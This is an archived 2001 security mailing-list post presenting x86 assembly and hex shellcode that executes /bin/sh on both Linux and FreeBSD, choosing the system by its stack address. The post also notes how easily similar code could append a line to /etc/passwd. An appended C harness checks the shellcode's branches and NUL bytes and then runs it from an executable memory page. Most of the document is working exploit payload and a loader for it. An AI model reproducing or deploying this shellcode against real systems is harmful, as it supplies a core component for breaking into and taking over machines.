Re: multi-OS infections (Multi OS shellcode)

From: Sweasel18at_private
Date: Thu Jul 26 2001 - 14:38:37 PDT

    The following asm was used to create the shellcode that follows it.  The 
    shellcode works on both Linux and *BSD on x86 arch (tested on Slackware and 
    FreeBSD).  The shellcode executes /bin/sh and does not do setresuid(), which 
    would be necessary for an exploit (it can be done the same way I do execve(); 
    yes, the code is ugly and not optimized but it does work).  Thanks to zen-parse 
    and corecode for the help.
    
    .text
    .global main
    main:   jmp    bottom
    top:    popl   %ebx              # ebx -> "/bin/sh" (address pushed by the call below)
            xorl   %edx, %edx        # edx = 0
            pushl  %edx              # NULL: terminates argv and is also envp[0]
            movl   %esp, %edx        # envp = &{NULL}
            pushl  %ebx              # argv[0] = "/bin/sh"
            movl   %esp, %ecx        # argv = &{"/bin/sh", NULL}
                                     # (arrays live on the stack; no register is assumed preset)
            pushl  %edx              # envp  -- BSD takes the arguments
            pushl  %ecx              # argv     from the stack, so push
            pushl  %ebx              # path     them in reverse order
            movl   $0xbfff0101, %esi # Linux puts the stack just under 0xc0000000,
            cmp    %esi, %esp        # FreeBSD/i386 just under 0xbfc00000
            jg     linux
            jmp    bsd
    exit:   add    $12, %esp
            movl   $0x11111112,%eax
            xorl   $0x11111113,%eax  # syscall 1, exit (same number on both)
            pushl  %eax
            int    $0x80
    linux:  movl   $0x1111113b, %eax
            xorl   $0x11111130, %eax # syscall 11 on Linux, execve (args in ebx/ecx/edx)
            int    $0x80
            jmp    exit
    bsd:    movl   $0x11111130, %eax
            xorl   $0x1111110b, %eax # syscall 59 on BSD, execve (args on the stack)
            pushl  %eax              # fake return address the BSD convention expects
            int    $0x80
            jmp    exit
    bottom: call   top
            .string "/bin/sh"
    
    "\xeb\x44\x5b\x31\xd2\x52\x89\xe2\x53\x89\xe1\x52\x51\x53\xbe\x01"
    "\x01\xff\xbf\x39\xf4\x7f\x12\xeb\x1e\x83\xc4\x0c\xb8\x12\x11\x11"
    "\x11\x35\x13\x11\x11\x11\x50\xcd\x80\xb8\x3b\x11\x11\x11\x35\x30"
    "\x11\x11\x11\xcd\x80\xeb\xe2\xb8\x30\x11\x11\x11\x35\x0b\x11\x11"
    "\x11\x50\xcd\x80\xeb\xd3\xe8\xb7\xff\xff\xff\x2f\x62\x69\x6e\x2f"
    "\x73\x68\x00\x90\x90"
    
    
    Doing something where the system calls are the same is a little bit easier 
    because you don't have to test whether it is BSD or Linux.  I have example 
    shellcode of this that writes hello world on my site, 
    www.lockeddown.net/dual.asm.  write, open, close are syscalls 4, 5, 6 
    respectively on both Linux and BSD, so writing shellcode to add a line to 
    /etc/passwd would be pretty easy and fairly small.
    
    lockdown
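
Editor's note: the C harness below is an added example and is not part of lockdown's post. Hand-edited shellcode of this kind breaks in two quiet ways: a relative jmp/jcc/call displacement that no longer points at an instruction once bytes are inserted or removed, and stray NUL bytes that stop a strcpy-style copy early. The harness embeds its own copy of the shellcode bytes (assembled from a variant of the listing that builds argv/envp on the stack; that copy, and the assumption that the only NUL is the string terminator, are this example's, so paste whatever version you are testing into the array), decodes the small x86 opcode subset the shellcode uses, checks that every branch lands on an instruction boundary inside the code, counts NULs, and only on i386 Linux or FreeBSD copies the bytes into an executable page and runs them.

```c
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Shellcode under test (assumption: assembled from the stack-built variant
 * of the listing; replace with the bytes you are checking). */
static const unsigned char shellcode[] =
    "\xeb\x44\x5b\x31\xd2\x52\x89\xe2\x53\x89\xe1\x52\x51\x53\xbe\x01"
    "\x01\xff\xbf\x39\xf4\x7f\x12\xeb\x1e\x83\xc4\x0c\xb8\x12\x11\x11"
    "\x11\x35\x13\x11\x11\x11\x50\xcd\x80\xb8\x3b\x11\x11\x11\x35\x30"
    "\x11\x11\x11\xcd\x80\xeb\xe2\xb8\x30\x11\x11\x11\x35\x0b\x11\x11"
    "\x11\x50\xcd\x80\xeb\xd3\xe8\xb7\xff\xff\xff/bin/sh\0\x90\x90";
#define SHELLCODE_LEN (sizeof(shellcode) - 1)   /* drop the literal's own NUL */

/* Bytes taken by a ModRM operand: ModRM, optional SIB, optional displacement. */
static int modrm_len(const unsigned char *p) {
    int mod = p[0] >> 6, rm = p[0] & 7, len = 1;
    if (mod == 3) return 1;                                /* register direct */
    if (rm == 4) len += 1;                                 /* SIB byte */
    if (mod == 1) len += 1;                                /* disp8 */
    else if (mod == 2 || (mod == 0 && rm == 5)) len += 4;  /* disp32 */
    return len;
}

/* Instruction length for the opcode subset used here; 0 means "unknown". */
static int insn_len(const unsigned char *p) {
    unsigned char op = p[0];
    if (op >= 0x50 && op <= 0x5f) return 1;                       /* push/pop r32 */
    if (op >= 0xb8 && op <= 0xbf) return 5;                       /* mov r32, imm32 */
    if (op == 0x31 || op == 0x39 || op == 0x89 || op == 0x8d)     /* xor/cmp/mov/lea */
        return 1 + modrm_len(p + 1);
    if (op == 0x83) return 1 + modrm_len(p + 1) + 1;              /* grp1 r/m32, imm8 */
    if (op == 0x35) return 5;                                     /* xor eax, imm32 */
    if (op == 0xcd) return 2;                                     /* int imm8 */
    if (op == 0xeb || (op >= 0x70 && op <= 0x7f)) return 2;       /* jmp/jcc rel8 */
    if (op == 0xe8 || op == 0xe9) return 5;                       /* call/jmp rel32 */
    return 0;
}

/* Offset of "/bin/sh": the data area begins here, so the code ends here. */
static int code_end(const unsigned char *sc, size_t len) {
    for (size_t i = 0; i + 7 <= len; i++)
        if (memcmp(sc + i, "/bin/sh", 7) == 0) return (int)i;
    return -1;
}

/* Resolved target of the branch at off, or -1 if off is not a branch. */
static int branch_target(const unsigned char *sc, int off) {
    unsigned char op = sc[off];
    if (op == 0xeb || (op >= 0x70 && op <= 0x7f))
        return off + 2 + (int8_t)sc[off + 1];
    if (op == 0xe8 || op == 0xe9) {
        uint32_t rel = (uint32_t)sc[off + 1] | (uint32_t)sc[off + 2] << 8 |
                       (uint32_t)sc[off + 3] << 16 | (uint32_t)sc[off + 4] << 24;
        return off + 5 + (int32_t)rel;
    }
    return -1;
}

/* NULs anywhere in the blob; anything beyond the string terminator truncates
 * the payload when it is copied as a C string. */
static int count_nul_bytes(const unsigned char *sc, size_t len) {
    int n = 0;
    for (size_t i = 0; i < len; i++) n += (sc[i] == 0);
    return n;
}

/* Decode the code region and verify each branch hits an instruction boundary
 * inside it. Returns the number of problems found (0 = clean). */
static int check_branches(const unsigned char *sc, size_t len) {
    unsigned char boundary[256] = {0};
    int end = code_end(sc, len), problems = 0, off;
    if (end < 0 || end > (int)sizeof boundary) return 1;
    for (off = 0; off < end; ) {                      /* pass 1: boundaries */
        int n = insn_len(sc + off);
        if (n == 0) { printf("unknown opcode %02x at %d\n", (unsigned)sc[off], off); return 1; }
        boundary[off] = 1;
        off += n;
    }
    if (off != end) problems++;                       /* decoding ran into the string */
    for (off = 0; off < end; off += insn_len(sc + off)) {   /* pass 2: targets */
        int t = branch_target(sc, off);
        if (t == -1) continue;
        if (t < 0 || t >= end || !boundary[t]) { printf("bad branch %d -> %d\n", off, t); problems++; }
    }
    return problems;
}

#if defined(__i386__) && (defined(__linux__) || defined(__FreeBSD__))
#include <sys/mman.h>
static void run_shellcode(const unsigned char *sc, size_t len) {
    void *page = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED) return;
    memcpy(page, sc, len);
    ((void (*)(void))page)();                         /* execve or exit; never returns */
}
#endif

int main(void) {
    int nul = count_nul_bytes(shellcode, SHELLCODE_LEN);
    int bad = check_branches(shellcode, SHELLCODE_LEN);
    printf("%zu bytes, %d NUL bytes, %d branch problems\n", SHELLCODE_LEN, nul, bad);
    if (bad) return 1;
#if defined(__i386__) && (defined(__linux__) || defined(__FreeBSD__))
    run_shellcode(shellcode, SHELLCODE_LEN);
#else
    puts("not on i386 Linux/FreeBSD; checks only, no execution");
#endif
    return 0;
}
```

The decoder covers only the opcodes this shellcode uses and reports anything else as unknown rather than guessing a length; extend insn_len() before trusting it on a different payload. The OS-detection branch itself (the esp comparison) is not exercised here: on a non-i386 host the harness stops after the static checks.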
    



    This archive was generated by hypermail 2b30 : Thu Jul 26 2001 - 15:39:25 PDT